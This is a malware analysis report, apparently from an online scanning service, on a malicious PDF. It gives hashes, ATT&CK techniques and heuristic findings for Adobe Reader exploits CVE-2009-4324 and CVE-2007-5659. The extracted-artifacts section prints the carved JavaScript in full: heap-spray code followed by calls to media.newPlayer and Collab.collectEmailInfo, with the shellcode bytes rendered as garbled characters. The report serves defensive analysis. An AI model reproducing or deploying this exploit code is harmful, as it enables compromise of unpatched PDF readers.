PDF malware analysis — malicious · 2e97601fea8d5c81

MALICIOUS

PDF

291.1 KB Created: IßÿÿómhÆ¸S=]X. Authoring application: Adobe Illustrator(R) 8.0 (via KµâmvÈ) First seen: 2026-05-07

MD5: 0d5c29a7b676a565b2a57e557b35a641 SHA-1: 27101ef67eddffa1f9b1f05e73a01bb8292619bb SHA-256: 2e97601fea8d5c81047cef573360c33135894cb61cb173aaef659037584dfd03

238 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1566.001 Spearphishing Attachment T1027 Obfuscated Files or Information

The PDF file contains embedded JavaScript, which is used to encrypt the document and hide its payload. This technique is commonly employed in phishing attacks to evade static analysis and deliver malicious content. The presence of JavaScript actions and encrypted content strongly suggests an attempt to conceal malicious activity, likely for credential harvesting or malware delivery.

Machine Learning

Nyx PDF Classifier clean score 0.2179

Heuristics 7

media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324

PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Encrypted PDF carries /JavaScript — payload hidden from static analysis high PDF_ENCRYPTED_WITH_JS

PDF declares /Encrypt and also references an executable trigger (/JavaScript). Document encryption hides the JavaScript body and stream contents from static scanners — combined with auto-execution indicators this is a known evasion pattern used to deliver weaponised JavaScript that the analyst cannot inspect without the decryption key.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 5

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0008_000.js`	pdf-javascript-stream	PDF /JS object 8 at offset 0x2D9	1735 bytes
SHA-256: `633890196f907bf2734e9a9dee8adfb95a1764d8bcf14714417194a609f82e01`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 7 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var v = app.viewerVersion.toString();if(v > '9.1') { var eapoWkBzvan5ZLLR = unescape('�'); var oZV1rvzTCFdljBmf = unescape('��'); var NbTIMeIHE6LoQhG1 = unescape('0x0c0c0c0c'); while(oZV1rvzTCFdljBmf.length <= 0x8000) oZV1rvzTCFdljBmf+=oZV1rvzTCFdljBmf; oZV1rvzTCFdljBmf=oZV1rvzTCFdljBmf.substring(0,0x8000 - eapoWkBzvan5ZLLR.length); memory=new Array(); for(i=0;i<0x2000;i++) { memory[i]= oZV1rvzTCFdljBmf + eapoWkBzvan5ZLLR; } util.printd('Cm29h2btGFf1RRfD', new Date()); util.printd('u9WPnog3t3rJj8Kz', new Date()); try {this.media.newPlayer(null);} catch(e) {} util.printd(NbTIMeIHE6LoQhG1, new Date());}if(v < '8.1.1') { var aI3ZlzDlK0Am3BKW = unescape('�'); var VKNcqTUs1ZSJ27wb =''; for (myAAxOwHX75aIP8o=128;myAAxOwHX75aIP8o>=0;--myAAxOwHX75aIP8o) VKNcqTUs1ZSJ27wb += unescape('��'); KUQZyvSzVvIW2E9R = VKNcqTUs1ZSJ27wb + aI3ZlzDlK0Am3BKW; WJcAhYSFfXpxwwlg = unescape('��'); fCFP9iOddhAfvI79 = 20; tiJJHmYwJNtGKfwl = fCFP9iOddhAfvI79+KUQZyvSzVvIW2E9R.length; while (WJcAhYSFfXpxwwlg.length<tiJJHmYwJNtGKfwl) WJcAhYSFfXpxwwlg+=WJcAhYSFfXpxwwlg; DCB1vZeYHoEC7LLi = WJcAhYSFfXpxwwlg.substring(0, tiJJHmYwJNtGKfwl); Ie3LQaIkyB1Jrx5k = WJcAhYSFfXpxwwlg.substring(0, WJcAhYSFfXpxwwlg.length-tiJJHmYwJNtGKfwl); while(Ie3LQaIkyB1Jrx5k.length+tiJJHmYwJNtGKfwl < 0x40000) Ie3LQaIkyB1Jrx5k = Ie3LQaIkyB1Jrx5k+Ie3LQaIkyB1Jrx5k+DCB1vZeYHoEC7LLi; QFl6pPe7DsJKEe4I = new Array(); for (P6ejgwUf9Vy1S3kd=0;P6ejgwUf9Vy1S3kd<1450;P6ejgwUf9Vy1S3kd++) QFl6pPe7DsJKEe4I[P6ejgwUf9Vy1S3kd] = Ie3LQaIkyB1Jrx5k + KUQZyvSzVvIW2E9R; var gVi9vMF0FYTTDWmW = unescape('%u0c0c%u0c0c'); while(gVi9vMF0FYTTDWmW.length < 0x4000) gVi9vMF0FYTTDWmW+=gVi9vMF0FYTTDWmW; this.collabStore = Collab.collectEmailInfo({subj: '',msg: gVi9vMF0FYTTDWmW});}
`font_00_cff_off0003db0f.bin`	pdf-font-stream	PDF embedded font (cff) at offset 0x3DB0F	12444 bytes
SHA-256: `25c83335f56f4a458c7dcbc97b239e50baab524c51d320b65d08bdb46d9e9f8b`
`font_01_cff_off00040304.bin`	pdf-font-stream	PDF embedded font (cff) at offset 0x40304	223 bytes
SHA-256: `e3a29578ab20270bea9d5e73ed3bb89fe82b22d5e9f36ebca886b042542e6be3`
`font_02_cff_off0004042f.bin`	pdf-font-stream	PDF embedded font (cff) at offset 0x4042F	1387 bytes
SHA-256: `b121f8b23641772680343bc86164434dc8a5e8198928b89d92fae917aa67e00f`
`font_03_cff_off00045a1c.bin`	pdf-font-stream	PDF embedded font (cff) at offset 0x45A1C	2144 bytes
SHA-256: `26d1afee32003f76646fa0684fd90d498305267e3beca7eac180408104193baf`

Open this report in the interactive analyzer, or submit your own file for analysis.